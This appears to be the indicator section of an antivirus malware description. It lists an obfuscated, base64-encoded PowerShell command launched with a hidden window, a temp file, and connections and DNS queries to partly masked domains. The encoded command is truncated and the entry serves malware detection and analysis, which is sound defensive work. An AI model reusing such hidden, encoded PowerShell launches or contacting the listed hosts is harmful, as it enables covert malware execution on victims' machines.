Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPAE4AQgBEAFAAdgBxAGsAPQAnAE8ATwBBAEoARwBpAHoAbgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAAZQBDAGAAVQBgAFIASQB0AHkAUABgAFIAbwB0AE8AQwBvAEwAIgAgAD...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1568
- %TEMP%\1376084.cvr
- 'ag###iann.com':443
- 'sw###algo.com':443
- '2.##xtt.com':443
- 'ag###iann.com':443
- DNS ASK ag###iann.com
- DNS ASK sw###algo.com
- DNS ASK li###artner.hk
- DNS ASK lt##et.com
- DNS ASK 2.##xtt.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPAE4AQgBEAFAAdgBxAGsAPQAnAE8ATwBBAEoARwBpAHoAbgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAAZQBDAGAAVQBgAFIASQB0AHkAUABgAFIAbwB0AE8AQwBvAEwAIgAgAD...' (with hidden window)